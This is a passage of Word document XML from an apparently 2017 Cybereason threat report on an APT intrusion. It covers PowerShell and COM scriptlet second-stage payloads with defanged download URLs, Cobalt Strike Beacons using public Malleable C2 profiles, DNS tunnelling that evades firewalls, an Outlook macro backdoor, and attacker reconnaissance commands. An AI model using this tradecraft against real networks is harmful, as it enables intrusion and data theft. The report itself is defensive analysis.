    <w:p w14:paraId="1037E357" w14:textId="77777777" w:rsidR="004B6019" w:rsidRPr="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B6019">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Example 1: Second Stage PowerShell Script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1934E8" w14:textId="77777777" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>This .txt file is actually a base64-encoded PowerShell payload that contains a shellcode:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210F79E1" w14:textId="77777777" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>©2017 Cybereason Inc. All rights reserved. 15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C37F28" w14:textId="77777777" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>File Name: login.txt, SHA-1: 9f95b81372eaf722a705d1f94a2632aad5b5c180</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF21A3F" w14:textId="77777777" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>The shellcode downloads additional payload from the URL: hxxp://food(.)letsmiles(.)org/9niL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E587E6" w14:textId="77777777" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>©2017 Cybereason Inc. All rights reserved. 16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9B786B" w14:textId="77777777" w:rsidR="004B6019" w:rsidRPr="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B6019">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Example 2: Second Stage COM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004B6019">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Scriptlet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004B6019">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10677000" w14:textId="77777777" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The regsvr32.exe downloader command downloads the following COM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>scriptlet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, which contains </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B405C48" w14:textId="77777777" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">an embedded shellcode: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F211D69" w14:textId="77777777" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>File Name: pic.png, SHA-1: f3e27ad08622060fa7a3cc1c7ea83a7885560899</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5472044F" w14:textId="77777777" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The shellcode downloads a payload from the following URL: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351C2942" w14:textId="77777777" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">hxxp://45(.)114.117.137/eXYF </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1467ABA9" w14:textId="77777777" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Final payload: Cobalt Strike Beacon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68312E56" w14:textId="77777777" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Analysis of the final stage payloads (such as “9niL” / “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eXYF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">”) clearly shows that they are Cobalt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CB7F12" w14:textId="77777777" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Strike Beacons: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D6A99C" w14:textId="77777777" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>©2017 Cybereason Inc. All rights reserved. 17</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643597DE" w14:textId="77777777" w:rsidR="004B6019" w:rsidRPr="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B6019">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2. Cobalt strike Malleable C2 communication </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77100373" w14:textId="77777777" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6150E2" w14:textId="77777777" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Another confirmation that the attackers used Cobalt Strike’s infrastructure came from the </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C68BC8C" w14:textId="77777777" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">analysis of the network traffic. The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>analyzed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> traffic matched Cobalt Strike’s Malleable C2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59164DE1" w14:textId="77777777" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The attackers used the Amazon, Google Safe Browsing, Pandora and OSCP profiles in this </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B696DE" w14:textId="77777777" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">attack, all of which are publicly available in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Github</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C68C3A" w14:textId="77777777" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/normal/safebrowsing.profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FE7525" w14:textId="77777777" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/normal/amazon.profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE0F1BF" w14:textId="77777777" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/normal/pandora.profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A6F60A" w14:textId="77777777" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/normal/oscp.profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7539CCAC" w14:textId="77777777" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>A .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pcap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file that was recorded during the execution of the Cobalt Strike payloads clearly shows </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456DEA08" w14:textId="77777777" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>the usage of the Malleable C2 profiles, in that case - the “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>safebrowsing.profile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>”:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B7FF03" w14:textId="77777777" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>©2017 Cybereason Inc. All rights reserved. 18</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BEE238" w14:textId="77777777" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Another example is the Amazon profile, generated by another Cobalt Strike payload: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F946CC" w14:textId="77777777" w:rsidR="004B6019" w:rsidRPr="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B6019">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3. Variant of Denis Backdoor using DNS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004B6019">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Tunneling</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="401DF2C0" w14:textId="77777777" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">During the investigation, an analysis of the backdoor’s traffic revealed that the attackers </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F68624" w14:textId="77777777" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">implemented DNS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tunneling</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> channel for C2 communication and data exfiltration. The DNS </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2784FD7A" w14:textId="77777777" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tunneling</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> channel was observed being used by the PowerShell payloads as well as the fake </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FD0877" w14:textId="77777777" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">DLLs (msfte.dll and goopdate.dll). In attempt to disguise the real IP/domain of the C&amp;C server, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3A7A3A" w14:textId="77777777" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">the backdoor communicates with the following DNS servers instead of communicating directly </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176FB101" w14:textId="77777777" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">with the C&amp;C servers: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E6341A" w14:textId="77777777" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Google DNS server: 8.8.8.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4469A0E3" w14:textId="77777777" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>OpenDNS server: 208.67.222.222</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234DFD55" w14:textId="77777777" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">By communicating with known DNS servers, the attackers ensured that the backdoor’s traffic </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FC69B1" w14:textId="77777777" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">will not be filtered by firewalls and other security products since it’s unlikely for most </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6F6D89" w14:textId="77777777" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>organizations to block OpenDNS and Google’s DNS servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCA107E" w14:textId="77777777" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Example of DNS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tunneling</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> can be seen in this instance of ARP.exe that was spawned by </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19287EDF" w14:textId="77777777" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">searchindexer.exe, which loaded the fake msfte.dll: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07045348" w14:textId="77777777" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:r>
        <w:t xml:space="preserve">[3] During the third phase of the attack, the attackers used an advanced technique that turned </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFBA3F5" w14:textId="77777777" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:r>
        <w:t xml:space="preserve">Microsoft Outlook into a C2 channel by replacing the email program’s original </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>VbaProject.OTM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCDCDB1" w14:textId="77777777" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:r>
        <w:t xml:space="preserve">macro container with a malicious one containing a backdoor functionality. Using this backdoor, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6558B10D" w14:textId="77777777" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:r>
        <w:t xml:space="preserve">the attackers managed to send system commands via emails from a Gmail address and </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168D30F1" w14:textId="77777777" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">exfiltrate data. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419B52A3" w14:textId="77777777" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:r>
        <w:t xml:space="preserve">The decoded malicious macro is loaded after boot and constantly looks for incoming emails </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0943EA21" w14:textId="77777777" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:r>
        <w:t>containing the strings $$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cpte</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and $$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ecpte</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1181763B" w14:textId="77777777" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019"/>
    <w:p w14:paraId="1EBC9FF9" w14:textId="77777777" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:r>
        <w:t xml:space="preserve">[3] The same technique was used to steal and exfiltrate sensitive company data, as seen in the screenshots below: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D49907E" w14:textId="77777777" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019"/>
    <w:p w14:paraId="1A31616F" w14:textId="77777777" w:rsidR="004B6019" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:r>
        <w:t xml:space="preserve">[3] After the attackers established a foothold on the compromised machines and established C2 communication, they scanned the network, enumerated machines and users and gathered more information about the environment. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AFC4E7" w14:textId="77777777" w:rsidR="004B6019" w:rsidRPr="00D729C5" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D729C5">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Internal Network Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B102B92" w14:textId="77777777" w:rsidR="00D729C5" w:rsidRDefault="004B6019" w:rsidP="004B6019">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">During the attack, Cybereason observed network scanning against entire ranges as well as specific machines. The attackers were looking for open ports, services, OS finger-printing and common vulnerabilities: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36231885" w14:textId="77777777" w:rsidR="00D729C5" w:rsidRDefault="00D729C5" w:rsidP="004B6019">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E642DD0" w14:textId="77777777" w:rsidR="00D729C5" w:rsidRPr="00D729C5" w:rsidRDefault="00D729C5" w:rsidP="00D729C5">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D729C5">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Information gathering commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320FAB41" w14:textId="7A136B58" w:rsidR="00D729C5" w:rsidRDefault="00D729C5" w:rsidP="00D729C5">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The attackers used several tools built into the Windows OS to gather information on the environment’s network and its users. Those tools included </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netsh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, ipconfig, netstat, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>arp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, net user/group/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>localgroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nslookup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and Windows Management Instrumentation (WMI).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EA7615" w14:textId="3F9C0716" w:rsidR="00D729C5" w:rsidRDefault="00D729C5" w:rsidP="00D729C5">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The following are a few examples of command line arguments that were used to gather information on the infected hosts and the network: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC0CB8E" w14:textId="77777777" w:rsidR="00D729C5" w:rsidRDefault="00D729C5" w:rsidP="00D729C5">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Command Purpose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684E152C" w14:textId="77777777" w:rsidR="00D729C5" w:rsidRDefault="00D729C5" w:rsidP="00D729C5">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">net </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>localgroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> administrators Enumerating admin users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168F2C4D" w14:textId="77777777" w:rsidR="00D729C5" w:rsidRDefault="00D729C5" w:rsidP="00D729C5">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>©2017 Cybereason Inc. All rights reserved. 24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA34E5B" w14:textId="77777777" w:rsidR="00D729C5" w:rsidRDefault="00D729C5" w:rsidP="00D729C5">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>net group "Domain Controllers" /domain Enumerating DC servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D01BE5E" w14:textId="77777777" w:rsidR="00D729C5" w:rsidRDefault="00D729C5" w:rsidP="00D729C5">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>klist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> tickets Displaying Kerberos Tickets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F0F6A9" w14:textId="77777777" w:rsidR="00D729C5" w:rsidRDefault="00D729C5" w:rsidP="00D729C5">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> \\[IP_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>redacted]\</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>c$ Displaying files on net share</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75339B6A" w14:textId="77777777" w:rsidR="00D729C5" w:rsidRDefault="00D729C5" w:rsidP="00D729C5">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>netstat -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>anpo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Displaying TCP connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DE3289" w14:textId="77777777" w:rsidR="00D729C5" w:rsidRDefault="00D729C5" w:rsidP="00D729C5">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>ipconfig /all Displaying Network adapter information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02458385" w14:textId="77777777" w:rsidR="00D729C5" w:rsidRDefault="00D729C5" w:rsidP="00D729C5">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>ping [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostname_redacted</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>] -n 1 Pinging a host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD33F50" w14:textId="77777777" w:rsidR="00D729C5" w:rsidRDefault="00D729C5" w:rsidP="00D729C5">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">net view \\[redacted] /all Shows all shares available, including </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2630AA2C" w14:textId="77777777" w:rsidR="00D729C5" w:rsidRDefault="00D729C5" w:rsidP="00D729C5">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>administrative shares like C$ and admin$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FD16C1" w14:textId="77777777" w:rsidR="00D729C5" w:rsidRDefault="00D729C5" w:rsidP="00D729C5">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netsh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wlan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> show interface Displaying Wireless adapter properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5EA982" w14:textId="77777777" w:rsidR="00D729C5" w:rsidRDefault="00D729C5" w:rsidP="00D729C5">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
